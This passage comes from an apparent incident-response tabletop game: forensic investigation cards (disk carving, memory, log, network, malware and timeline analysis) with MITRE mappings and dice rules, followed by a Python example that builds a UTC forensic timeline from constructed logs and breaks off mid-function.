║ Technique: Advanced File Recovery & Data Carving               ║
║ MITRE ATT&CK: T1074 (Data Staged), T1485 (Data Destruction)    ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14                                           ║
║ Budget Cost: 15                                                ║
║ Duration: 3 turns (specialized expertise required)             ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Advanced carving techniques recover data from unallocated      ║
║ disk space and file slack, even when files have been deleted   ║
║ and storage sectors overwritten. Uses specialized tools like   ║
║ EnCase, FTK, or open-source carving tools.                     ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Deleted malware (recovered from free space)                  ║
║ - Temporary files (attacker staging data before exfil)         ║
║ - Encryption keys or passphrases (memory remnants on disk)     ║
║ - Hidden partitions or file systems                            ║
║ - Slack space artifacts                                        ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14):                                        ║
║ Discover ONE Evidence card from: Deep Malware Samples,         ║
║ Encryption Keys Found, or Hidden Backdoor evidence.            ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +20%, Chain of Custody +10%                       ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 12-13):                                  ║
║ Discover partial data (e.g., fragments of deleted file).       ║
║ Advance: Attack Chain +10%, Chain of Custody +5%               ║
║                                                                 ║
║ FAILURE (roll < 12):                                           ║
║ Data too corrupted or already overwritten. No recovery.        ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Carving is technically sound but must be documented carefully. ║
║ Chain of Custody: Strong if done by certified analyst.         ║
║ ⚠ Partial carving may be challenged in court (incomplete       ║
║   file recovery). Recommend combining with other techniques.   ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has GCFE (Certified Forensic Examiner)      ║
║ +1 if investigator has disk forensics experience               ║
║ +1 if combined with DISK-01 investigation already done         ║
║ -1 if SSD drives present (wear-leveling complicates carving)   ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Expensive investigation (15 budget) for specialized work     ║
║ • Can take weeks in real incidents; represented as 3 turns     ║
║ • Most valuable for discovering deleted persistence and        ║
║   encryption keys                                              ║
║ • Less effective on modern systems with TRIM/wear-leveling     ║
╚════════════════════════════════════════════════════════════════╝

MEM-01: Memory Dump & Analysis

╔════════════════════════════════════════════════════════════════╗
║              MEM-01: MEMORY DUMP & ANALYSIS                    ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Volatile Memory Forensics (RAM analysis)            ║
║ MITRE ATT&CK: T1055 (Process Injection), T1057 (Process        ║
║              Discovery), T1518 (Software Discovery)            ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13                                           ║
║ Budget Cost: 15                                                ║
║ Duration: 2 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Capture RAM (volatile memory) from running system during       ║
║ incident response, then analyze for active processes, malware, ║
║ injected code, network connections, and encryption keys in     ║
║ memory. Uses tools like Volatility, Rekall, or proprietary     ║
║ memory analysis suites.                                        ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Malware processes running in memory                          ║
║ - Injected code (shellcode, DLLs in unexpected processes)      ║
║ - Network connections (established C2 connections)             ║
║ - Encryption keys and credentials in memory                    ║
║ - Command history from interactive shells                      ║
║ - Rootkit or kernel-level hooks                                ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13):                                        ║
║ Discover ONE Evidence card from: Active Malware Process,       ║
║ C2 Connection, or Injected Code evidence.                      ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +20%, Timeline Completeness +10%                  ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 11-12):                                  ║
║ Discover evidence of suspicious process (incomplete details).  ║
║ Advance: Attack Chain +10%, Timeline Completeness +5%          ║
║                                                                 ║
║ FAILURE (roll < 11):                                           ║
║ Malware may use anti-forensics in memory; analysis inconclusive║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Memory capture is volatile and must be done immediately.       ║
║ Chain of Custody: Strong if documented with timestamps.        ║
║ ✓ Admissible, but include disclaimer about volatile nature    ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator trained in memory forensics (Volatility)    ║
║ +1 if malware analysis background                              ║
║ +1 if Analyze Evidence action previously discovered malware    ║
║ -2 if memory was overwritten before capture (time-sensitive)   ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Time-critical: Memory is lost if system is rebooted          ║
║ • Reveals active threats that may not exist on disk            ║
║ • Combines process discovery with malware analysis             ║
║ • Most valuable for finding active C2 connections              ║
╚════════════════════════════════════════════════════════════════╝

MEM-02: Memory Forensics Deep Dive

╔════════════════════════════════════════════════════════════════╗
║              MEM-02: MEMORY FORENSICS DEEP DIVE                ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Advanced Volatile Memory Analysis                   ║
║ MITRE ATT&CK: T1112 (Modify Registry), T1055 (Process          ║
║              Injection), T1140 (Deobfuscate/Decode Files)      ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 15                                           ║
║ Budget Cost: 20                                                ║
║ Duration: 3 turns (expert-level analysis)                      ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Expert-level memory analysis including malware behavior        ║
║ simulation, deobfuscation of shellcode, reverse engineering    ║
║ of code injected into memory, and recovery of encryption keys. ║
║ Requires deep expertise in assembly language, malware tactics, ║
║ and memory layouts.                                            ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Obfuscated/encrypted malware payloads (deobfuscate them)     ║
║ - Code injection techniques (understand HOW malware hides)     ║
║ - Encryption keys and passphrases in memory (crypto recovery)  ║
║ - Malware command history (recent attacker commands)           ║
║ - Process hollowing or code caves (anti-analysis techniques)   ║
║ - Privilege escalation vulnerabilities in use                  ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 15):                                        ║
║ Discover TWO Evidence cards: One from malware behavior set     ║
║ (e.g., Encryption Keys, Command History) + one from attack     ║
║ technique set (e.g., Code Injection Method, Exploitation Used).║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +25%, Attribution +20%                            ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 13-14):                                  ║
║ Discover ONE complete Evidence + incomplete second evidence.   ║
║ Advance: Attack Chain +15%, Attribution +10%                   ║
║                                                                 ║
║ FAILURE (roll < 13):                                           ║
║ Malware uses sophisticated anti-analysis; analysis fails.      ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Analysis documentation critical (how did you reach conclusions)║
║ Chain of Custody: Strong if reverse engineering is documented. ║
║ ⚠ Conclusions must be explained clearly for court admissibility║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +3 if investigator has GCFA (Certified Forensic Analyst)       ║
║ +2 if malware reverse engineering background                   ║
║ +1 if Malware Analysis card already completed                  ║
║ +1 if detailed explanation of deobfuscation approach           ║
║ -2 if malware is heavily obfuscated or virtualized             ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Most expensive memory analysis (20 budget)                   ║
║ • Requires reverse engineering expertise                       ║
║ • Discovers "why" the malware works, not just "what"          ║
║ • Essential for understanding sophisticated attacks            ║
║ • Can take weeks in real investigations; represented as 3 turns║
╚════════════════════════════════════════════════════════════════╝

LOG-01: Event Log Analysis

╔════════════════════════════════════════════════════════════════╗
║              LOG-01: EVENT LOG ANALYSIS                        ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Windows/Linux Log Examination                       ║
║ MITRE ATT&CK: T1552 (Unsecured Credentials), T1098 (Account    ║
║              Manipulation)                                     ║
║              T1021 (Remote Services), T1078 (Valid Accounts)   ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 11                                           ║
║ Budget Cost: 5                                                 ║
║ Duration: 1 turn                                               ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Analyze system event logs (Windows Event Log, syslog, etc.)    ║
║ to identify user logins, privilege escalations, file access,   ║
║ and process execution. This is foundational and relatively     ║
║ quick—useful for establishing a basic timeline.                ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Failed login attempts (brute force evidence)                 ║
║ - Successful logins from unusual locations/times               ║
║ - Privilege escalation attempts (RunAs, sudo)                  ║
║ - Process creation events                                      ║
║ - Service installation events                                  ║
║ - File access to sensitive files                               ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 11):                                        ║
║ Discover ONE Evidence card from: Suspicious Login Timeline,    ║
║ Privilege Escalation Attempt, or Service Installation evidence.║
║ Advance (only if no Evidence card produced):                   ║
║ Timeline Completeness +15%, Attack Chain +10%                  ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 9-10):                                   ║
║ Discover partial timeline (logs are fragmented or unclear).    ║
║ Advance: Timeline Completeness +5%, Attack Chain +5%           ║
║                                                                 ║
║ FAILURE (roll < 9):                                            ║
║ Logs were deleted or corrupted; no useful evidence.            ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Logs must be exported with metadata (timestamps, user context).║
║ Chain of Custody: Strong if logs are digitally signed.         ║
║ ✓ Admissible in court (widely accepted evidence type)         ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +1 if investigator has Windows administration experience       ║
║ +1 if investigator has SIEM/log analysis background            ║
║ +1 if detailed explanation of log analysis approach            ║
║ +2 if prior Timeline Reconstruction investigation completed    ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Cheapest investigation (5 budget) - good starting point      ║
║ • Fastest (1 turn) - can be done early in investigation        ║
║ • Foundation for Timeline Reconstruction and Log Correlation   ║
║ • May be ineffective if attacker deleted logs (add             ║
║   anti-forensics penalty: +2 DC)                               ║
╚════════════════════════════════════════════════════════════════╝

LOG-02: Deep Log Correlation

╔════════════════════════════════════════════════════════════════╗
║              LOG-02: DEEP LOG CORRELATION                      ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Cross-System Log Analysis & Correlation             ║
║ MITRE ATT&CK: T1087 (Account Discovery), T1021 (Remote         ║
║              Services), T1083 (File and Directory Discovery)   ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13                                           ║
║ Budget Cost: 10                                                ║
║ Duration: 2 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Correlate logs from multiple systems (servers, firewalls, IDS, ║
║ proxies, domain controllers) to build a complete timeline of   ║
║ attacker lateral movement and actions across the environment.  ║
║ Requires SIEM expertise or manual correlation tools.           ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Lateral movement pattern (login on A → login on B → etc)     ║
║ - Privilege escalation sequence (user to admin to system)      ║
║ - Command execution across systems                             ║
║ - Network connections (firewall → host activity)               ║
║ - Timeline of data access and exfiltration                     ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13):                                        ║
║ Discover ONE Evidence card from: Lateral Movement Pattern,     ║
║ Complete Attack Timeline, or Attacker Command Sequence.        ║
║ Advance (only if no Evidence card produced):                   ║
║ Timeline Completeness +20%, Attack Chain +25%                  ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 11-12):                                  ║
║ Discover partial timeline (some systems missing logs).         ║
║ Advance: Timeline Completeness +15%, Attack Chain +10%         ║
║                                                                 ║
║ FAILURE (roll < 11):                                           ║
║ Too many log gaps; timeline cannot be reliably correlated.     ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Correlation requires clear documentation of methodology.       ║
║ Chain of Custody: Strong if SIEM tool provided audit trail.    ║
║ ✓ Admissible if correlation process is documented clearly     ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has SIEM administration (Splunk, ArcSight)  ║
║ +1 if LOG-01 already completed (building on prior analysis)    ║
║ +1 if detailed explanation of correlation methodology          ║
║ +2 if team provides narrative of suspected attacker movements  ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Most valuable for understanding "how" attacker moved         ║
║ • Reveals attack pace and duration (dwell time)                ║
║ • Can expose failed lateral movement attempts                  ║
║ • Requires multiple systems to have logging enabled            ║
╚════════════════════════════════════════════════════════════════╝

NET-01: Network Traffic Analysis

╔════════════════════════════════════════════════════════════════╗
║              NET-01: NETWORK TRAFFIC ANALYSIS                  ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Packet Capture & Flow Analysis                      ║
║ MITRE ATT&CK: T1041 (Exfiltration Over C2), T1048 (Alternative ║
║              Protocol), T1071 (Application Layer Protocol)     ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12                                           ║
║ Budget Cost: 10                                                ║
║ Duration: 2 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Analyze network traffic captures (PCAP) or network flow records║
║ (NetFlow) to identify communication patterns, exfiltration     ║
║ evidence, and command-and-control connections. Uses tools like ║
║ Wireshark, Zeek, or commercial traffic analysis platforms.     ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Unusual outbound connections (C2 domains, IPs)               ║
║ - Large data transfers (exfiltration evidence)                 ║
║ - Encrypted tunnels (VPN, proxy connections)                   ║
║ - DNS queries for suspicious domains                           ║
║ - HTTP user agents inconsistent with legitimate software       ║
║ - Beacon-like patterns (regular connection attempts)           ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12):                                        ║
║ Discover ONE Evidence card from: C2 Server Evidence,           ║
║ Exfiltration Traffic Pattern, or Suspicious Domain Lookup.     ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +20%, Attribution +15%                            ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 10-11):                                  ║
║ Discover suspicious traffic but destination unclear.           ║
║ Advance: Attack Chain +10%, Attribution +5%                    ║
║                                                                 ║
║ FAILURE (roll < 10):                                           ║
║ Traffic too encrypted or obfuscated; cannot analyze.           ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ PCAP files must include timestamp and collection metadata.     ║
║ Chain of Custody: Strong if collected from router/IDS.         ║
║ ✓ Admissible (widely accepted for network evidence)           ║
║ ⚠ Encrypted traffic reveals patterns but not content           ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has Wireshark/packet analysis certification ║
║ +1 if network engineering background                           ║
║ +1 if Threat Attribution evidence already discovered           ║
║ -1 if traffic is heavily encrypted or anonymized               ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Reveals attacker communication patterns                      ║
║ • Can identify C2 infrastructure                               ║
║ • Exfiltration volume is critical evidence                     ║
║ • Encrypted traffic is harder to analyze but patterns visible  ║
╚════════════════════════════════════════════════════════════════╝

NET-02: Packet Capture Deep Analysis

╔════════════════════════════════════════════════════════════════╗
║              NET-02: PACKET CAPTURE DEEP ANALYSIS              ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Advanced Protocol Forensics & Reconstruction        ║
║ MITRE ATT&CK: T1557 (Adversary-in-the-Middle), T1040 (Network  ║
║              Sniffing), T1071 (Application Layer Protocol)     ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14                                           ║
║ Budget Cost: 15                                                ║
║ Duration: 3 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Deep packet inspection including protocol reconstruction       ║
║ (rebuilding HTTP streams, email messages, file transfers from  ║
║ packet payloads), malware traffic analysis, and detection of   ║
║ exploitation attempts in traffic. Requires advanced networking  ║
║ and protocol knowledge.                                        ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Reconstructed HTTP/S traffic (actual data transferred)       ║
║ - Exploitation payloads in network traffic (shellcode, etc)    ║
║ - Malware command protocols (custom C2 protocols)              ║
║ - Authentication attempts (credentials in transit)             ║
║ - Man-in-the-middle evidence (SSL/TLS downgrade, cert          ║
║   mismatches)                                                  ║
║ - Attacker reconnaissance traffic patterns                     ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14):                                        ║
║ Discover TWO Evidence cards from: Exploitation Traffic,        ║
║ C2 Protocol Details, or Attacker Reconnaissance Pattern.       ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +25%, Attribution +25%                            ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 12-13):                                  ║
║ Discover ONE complete evidence + incomplete second.            ║
║ Advance: Attack Chain +15%, Attribution +10%                   ║
║                                                                 ║
║ FAILURE (roll < 12):                                           ║
║ Encryption or obfuscation prevents useful reconstruction.      ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ PCAP reconstruction must document decoding methodology.        ║
║ Chain of Custody: Moderate (depends on decoding assumptions).  ║
║ ⚠ If encrypted traffic decoded, must explain decryption method║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has network forensics certification         ║
║ +2 if protocol reverse engineering experience                  ║
║ +1 if NET-01 already completed (building on analysis)          ║
║ -2 if traffic is encrypted and keys not recovered              ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Most detailed network analysis (3 turns)                     ║
║ • Requires protocol expertise (HTTP, DNS, custom protocols)    ║
║ • Reveals actual attacker commands and data stolen             ║
║ • Challenging when traffic is encrypted                        ║
╚════════════════════════════════════════════════════════════════╝

MALW-01: Malware Analysis (Dynamic)

╔════════════════════════════════════════════════════════════════╗
║              MALW-01: MALWARE ANALYSIS (DYNAMIC)               ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Behavioral Malware Analysis                         ║
║ MITRE ATT&CK: T1518 (Software Discovery), T1082 (System Info), ║
║              T1012 (Query Registry), T1033 (System Owner/User)  ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12                                           ║
║ Budget Cost: 15                                                ║
║ Duration: 2 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Execute malware samples in an isolated sandbox environment     ║
║ and record their behavior. Monitor file system changes,        ║
║ registry modifications, network connections, and process       ║
║ creation to understand what the malware does without reverse   ║
║ engineering. Uses tools like Cuckoo, Any.run, or commercial    ║
║ sandboxes.                                                     ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - File system changes (what files created/modified)            ║
║ - Registry modifications (persistence mechanisms)              ║
║ - Network communications (DNS, HTTP, and other connections)    ║
║ - Process creation (child processes, injections)               ║
║ - System enumeration (reconnaissance activity)                 ║
║ - Anti-analysis techniques (checks for sandbox)                ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12):                                        ║
║ Discover ONE Evidence card from: Malware Behavior Profile,     ║
║ Persistence Mechanism Created, or C2 Callback Observed.        ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +20%, Attribution +10%                            ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 10-11):                                  ║
║ Malware behavior observed but some details unclear.            ║
║ Advance: Attack Chain +10%, Attribution +5%                    ║
║                                                                 ║
║ FAILURE (roll < 10):                                           ║
║ Malware detects sandbox; exhibits anti-analysis behavior.      ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Sandbox execution creates video/log recordings of behavior.    ║
║ Chain of Custody: Strong if sandbox logs are preserved.        ║
║ ✓ Admissible (widely accepted malware analysis evidence)      ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has GREM (GIAC Reverse Engineering Malware) ║
║ +1 if incident responder with malware analysis training        ║
║ +1 if detailed explanation of behavioral analysis approach     ║
║ -1 if malware implements anti-sandbox techniques               ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Safer than static analysis (execution is isolated)           ║
║ • Reveals "what the malware does" not "how it works"          ║
║ • Complements Static Analysis (MALW-02) well                  ║
║ • Useful for identifying persistence and C2 behavior           ║
╚════════════════════════════════════════════════════════════════╝

MALW-02: Malware Analysis (Static)

╔════════════════════════════════════════════════════════════════╗
║              MALW-02: MALWARE ANALYSIS (STATIC)                ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Code Reverse Engineering & Analysis                 ║
║ MITRE ATT&CK: T1140 (Deobfuscate/Decode Files), T1027          ║
║              (Obfuscated Files or Information), T1071          ║
║              (Application Layer Protocol)                      ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14                                           ║
║ Budget Cost: 10                                                ║
║ Duration: 2 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Disassemble and analyze malware code without execution using   ║
║ reverse engineering tools (IDA Pro, Ghidra, Binary Ninja, etc).║
║ Examine assembly code, strings, imports, and code structure to ║
║ understand attacker capabilities and techniques. Requires      ║
║ assembly language and debugging expertise.                     ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Hardcoded C2 servers, encryption keys                        ║
║ - Malware capabilities (spyware, RAT, backdoor, etc)           ║
║ - Obfuscation techniques (packing, encryption, polymorphism)   ║
║ - Code similarities to known malware families                  ║
║ - Exploit code (zero-days, known CVEs)                         ║
║ - Attacker identity clues (developer name, code style)         ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14):                                        ║
║ Discover ONE Evidence card from: Malware Source Code Analysis, ║
║ Hardcoded C2 Server, or Code Similarity to Known Family.       ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +20%, Attribution +25%                            ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 12-13):                                  ║
║ Understand some code features but full analysis incomplete.    ║
║ Advance: Attack Chain +10%, Attribution +10%                   ║
║                                                                 ║
║ FAILURE (roll < 12):                                           ║
║ Malware is heavily obfuscated; code analysis inconclusive.     ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Reverse engineering analysis is documented with screenshots    ║
║ Chain of Custody: Moderate (interpretation-dependent).         ║
║ ⚠ Conclusions must be clearly explained for admissibility     ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +3 if investigator has GREM (GIAC Reverse Engineering Malware) ║
║ +2 if assembly language and debugging expertise                ║
║ +1 if MALW-01 already completed (builds on behavior findings)  ║
║ +1 if detailed explanation of reverse engineering approach     ║
║ -2 if malware is polymorphic/heavily obfuscated                ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Highest skill requirement (DC 14)                            ║
║ • Reveals "how the malware works"                              ║
║ • Can identify code reuse and attacker patterns                ║
║ • Complements Behavior Analysis (MALW-01) well                ║
║ • Time-consuming (2 turns represents weeks of analysis)        ║
╚════════════════════════════════════════════════════════════════╝

TIMELINE-01: Timeline Reconstruction

╔════════════════════════════════════════════════════════════════╗
║              TIMELINE-01: TIMELINE RECONSTRUCTION              ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Event Correlation & Chronological Analysis          ║
║ MITRE ATT&CK: T1074 (Data Staged), T1087 (Account Discovery), ║
║              T1046 (Network Service Discovery)                 ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13                                           ║
║ Budget Cost: 5                                                 ║
║ Duration: 1 turn                                               ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Synthesize evidence from multiple sources (logs, timestamps,   ║
║ file metadata, malware analysis) into a unified chronological  ║
║ timeline of the attack. Identify sequence of events, dwell     ║
║ time, and decision points.                                     ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Entry point and initial compromise time                      ║
║ - Privilege escalation points and timing                       ║
║ - Lateral movement sequence                                    ║
║ - Data reconnaissance timeline                                 ║
║ - Exfiltration timing (when, how much, for how long)           ║
║ - Dwell time (time in network before detection)                ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13):                                        ║
║ Discover ONE Evidence card: Complete Attack Timeline with      ║
║ key decision points and transitions between phases identified. ║
║ Advance (only if no Evidence card produced):                   ║
║ Timeline Completeness +25%, Attack Chain +15%                  ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 11-12):                                  ║
║ Partial timeline with some events missing or unclear.          ║
║ Advance: Timeline Completeness +15%, Attack Chain +10%         ║
║                                                                 ║
║ FAILURE (roll < 11):                                           ║
║ Too many timestamp discrepancies; timeline unreliable.         ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Timeline must reference source evidence for each event.        ║
║ Chain of Custody: Strong if well-documented, cross-referenced  ║
║ ✓ Admissible if timeline sources are cited                    ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator is DFIR-trained (Digital Forensics &        ║
║    Incident Response)                                          ║
║ +1 if LOG-01 or LOG-02 already completed                       ║
║ +2 if detailed explanation synthesizes several evidence sources║
║ +1 if team notes discrepancies and explains them               ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Critical for understanding attack progression                ║
║ • Cheap (5 budget) but requires multiple prior investigations  ║
║ • Fast (1 turn) but depends on prior evidence collection       ║
║ • Foundation for narrative reconstruction of incident          ║
╚════════════════════════════════════════════════════════════════╝
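
Timeline reconstruction as the card describes it, shown as an added example (not part of the game's files or rules): three constructed log sources with different timestamp conventions are normalized to UTC, ordered, cited by source for chain of custody, measured for dwell time, and checked for clock discrepancies between sources that recorded the same event. The source names, field layouts, host time zone and exfiltration byte cutoff are assumptions made for the example.

```python
"""Timeline reconstruction across evidence sources (added example).

Constructed inputs only: a Windows Security log export (host-local time),
a firewall log (ISO 8601, UTC) and disk-image file metadata (ISO 8601 with
offset) are merged into one UTC timeline that cites its source per event.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True, order=True)
class Event:
    ts: datetime            # always timezone-aware UTC
    source: str             # evidence source cited for this entry
    phase: str              # attack phase tag assigned by the analyst
    detail: str
    ref: str = ""           # shared id when two sources saw the same event


# ---- constructed sample inputs (not real incident data) -------------
# Windows Security log export; timestamps are host-local, assumed UTC-5.
WIN_LOG = [
    "2024-10-15 03:22:15|4624|Administrator|192.0.2.100|RDP logon|LOGON-1",
    "2024-10-15 03:25:40|4698|Administrator|-|Task created: Windows_Update_Service|",
]
WIN_TZ = timezone(timedelta(hours=-5))
# Analyst's mapping of event IDs to attack phases (assumption).
WIN_PHASES = {"4624": "initial-access", "4698": "persistence"}

# Firewall log, ISO 8601 with trailing Z; an optional trailing correlation id.
FW_LOG = [
    "2024-10-15T08:21:10Z RDP-ALLOW 192.0.2.100 -> 10.0.0.15:3389 LOGON-1",
    "2024-10-15T08:30:00Z OUT 10.0.0.15 -> 192.0.2.45:443 bytes=1200",
    "2024-10-17T13:00:05Z OUT 10.0.0.15 -> 192.0.2.45:443 bytes=48000000",
]
EXFIL_THRESHOLD = 10_000_000      # bytes; analyst-chosen cutoff (assumption)

# Disk-image file metadata, ISO 8601 with explicit offset.
FILE_META = [
    "2024-10-15T08:24:02+00:00 C:\\Windows\\System32\\msupd.exe created",
]

# The alert that started the response; marks the end of dwell time.
DETECTED_AT = datetime(2024, 10, 18, 9, 15, tzinfo=timezone.utc)


def parse_windows(line: str) -> Event:
    ts, eid, user, src, msg, ref = line.split("|")
    local = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=WIN_TZ)
    return Event(local.astimezone(timezone.utc), "LOG-01 Security.evtx",
                 WIN_PHASES.get(eid, "unknown"),
                 f"EID {eid} {user} from {src}: {msg}", ref)


def parse_firewall(line: str) -> Event:
    tok = line.split()
    ts = datetime.strptime(tok[0], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    ref = next((t for t in tok if t.startswith("LOGON-")), "")
    nbytes = next((int(t[6:]) for t in tok if t.startswith("bytes=")), 0)
    if tok[1] == "RDP-ALLOW":
        phase = "initial-access"
    elif nbytes >= EXFIL_THRESHOLD:
        phase = "exfiltration"
    else:
        phase = "c2-beacon"
    return Event(ts, "NET-01 firewall.log", phase, " ".join(tok[1:]), ref)


def parse_file_meta(line: str) -> Event:
    ts_str, path, action = line.split(" ", 2)
    ts = datetime.fromisoformat(ts_str).astimezone(timezone.utc)
    return Event(ts, "DISK-01 image", "persistence", f"{path} {action}")


def build_timeline() -> list[Event]:
    events = [parse_windows(l) for l in WIN_LOG]
    events += [parse_firewall(l) for l in FW_LOG]
    events += [parse_file_meta(l) for l in FILE_META]
    events.append(Event(DETECTED_AT, "EDR alert", "detection", "EDR flagged msupd.exe"))
    return sorted(events)     # order=True sorts by ts first


def dwell_time(timeline: list[Event]) -> timedelta:
    """Earliest attacker-attributed event up to the detection event."""
    first = min(e.ts for e in timeline if e.phase != "detection")
    detected = next(e.ts for e in timeline if e.phase == "detection")
    return detected - first


def clock_discrepancies(timeline: list[Event], tolerance_s: float = 60.0):
    """Same event (shared ref) seen by different sources more than
    tolerance_s apart. These must be noted and explained in the report
    (clock skew, logging delay) rather than silently reconciled."""
    by_ref: dict[str, list[Event]] = {}
    for e in timeline:
        if e.ref:
            by_ref.setdefault(e.ref, []).append(e)
    found = []
    for ref, seen in by_ref.items():
        span = max(s.ts for s in seen) - min(s.ts for s in seen)
        if span.total_seconds() > tolerance_s:
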